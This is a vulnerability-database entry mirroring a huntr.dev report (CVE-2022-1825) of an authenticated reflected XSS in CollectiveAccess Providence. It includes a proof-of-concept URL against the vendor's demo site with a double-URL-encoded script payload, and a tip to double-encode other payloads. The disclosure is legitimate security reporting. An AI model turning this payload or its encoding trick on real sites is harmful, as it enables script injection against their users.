Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntr0xrawC6AD4CEF-1B3D-472F-AF0E-68E46341DFE5
HistoryApr 29, 2022 - 5:23 a.m.

Reflected XSS

2022-04-2905:23:41
0xraw
www.huntr.dev
12
reflected xss
authenticated
path fragment
user input
url encoding
vulnerability
url path

EPSS

0.001

Percentile

21.4%

JSON

Description

Hello ,
i found an authenticated reflected xss via path fragment this was exploitable through trusting user input in url path fragement
, please note : if you wrote a different payload you need to URL Encode the payload twice

Proof of Concept

Enter this url : https://demo.collectiveaccess.org/index.php/system/Error/Show/n/3250%22%253CScRiPt%2520%253Ealert(%221337%22)%253C%252FsCripT%253E

Picture:

Vuln_Line

Kind Regards,

Rawi (@0xRaw)

Related

prion 1
osv 1
cvelist 1
cve 1
nvd 1
prion
prion
Cross site scripting
2022-05-23 11:16:00
osv
osv
CVE-2022-1825
2022-05-23 11:16:10
cvelist
cvelist
CVE-2022-1825 Cross-site Scripting (XSS) - Reflected in collectiveaccess/providence
2022-05-23 10:40:09
cve
cve
CVE-2022-1825
2022-05-23 11:16:10
nvd
nvd
CVE-2022-1825
2022-05-23 11:16:10

EPSS

0.001

Percentile

21.4%

JSON
Related for C6AD4CEF-1B3D-472F-AF0E-68E46341DFE5
prion1osv1cvelist1cve1nvd1